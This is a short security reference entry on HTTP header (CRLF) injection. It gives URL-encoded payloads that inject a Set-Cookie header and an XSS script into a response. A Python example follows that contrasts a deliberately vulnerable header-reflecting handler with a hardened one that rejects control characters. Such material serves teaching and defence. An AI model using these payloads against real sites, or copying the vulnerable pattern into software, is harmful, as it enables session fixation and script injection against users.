HTTP Header Injection
Last modified: 2024-02-08
If the target site inserts a user-provided value into a response header without sanitizing it, an attacker may inject arbitrary header key/value pairs.
Exploit
By inserting \r\n (URL encoded: %0d%0a), we may inject an arbitrary header value into the response.
# Inject "\r\nSet-Cookie: SESSID=123456" into the response header
/?origin=example%0d%0aSet-Cookie:%20SESSID%3d123456
Exploit (XSS)
/?origin=example%0d%0a<html><script>alert(1)</script>
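Added example (not code from the original page): a handler that reflects the page's origin parameter into a response header, first without validation and then with a check that rejects CR/LF and other control characters. The header name Access-Control-Allow-Origin and all function names are assumptions made for illustration; the query string is the Set-Cookie payload shown above.

```python
from urllib.parse import parse_qs

# Query string from the page's Set-Cookie example (leading "/?" removed).
PAGE_PAYLOAD = "origin=example%0d%0aSet-Cookie:%20SESSID%3d123456"

def _render(origin: str) -> bytes:
    """Serialize a minimal response; the reflected header name is an assumption."""
    head = (
        "HTTP/1.1 200 OK\r\n"
        f"Access-Control-Allow-Origin: {origin}\r\n"
        "Content-Type: text/plain\r\n"
        "\r\n"
    )
    return head.encode("latin-1") + b"ok"

def build_response_vulnerable(query: str) -> bytes:
    """parse_qs percent-decodes %0d%0a, so a raw CRLF reaches the header block."""
    origin = parse_qs(query).get("origin", [""])[0]
    return _render(origin)

def safe_header_value(value: str) -> str:
    """Refuse CR, LF, NUL and other control characters (tab is allowed)."""
    for ch in value:
        if (ord(ch) < 0x20 and ch != "\t") or ord(ch) == 0x7F:
            raise ValueError("control character in header value")
    return value

def build_response_hardened(query: str) -> bytes:
    """Validate after decoding; answer 400 instead of emitting a tainted header."""
    origin = parse_qs(query).get("origin", [""])[0]
    try:
        return _render(safe_header_value(origin))
    except ValueError:
        return b"HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"

def header_names(raw: bytes) -> list[str]:
    """Header names as a client sees them: everything before the first blank line."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    return [line.split(":", 1)[0] for line in head.split("\r\n")[1:] if ":" in line]

if __name__ == "__main__":
    print("vulnerable:", header_names(build_response_vulnerable(PAGE_PAYLOAD)))
    print("hardened:  ", header_names(build_response_hardened(PAGE_PAYLOAD)))
```

The check runs on the decoded value, because filtering the literal string %0d%0a before decoding misses double-encoded or otherwise transformed input.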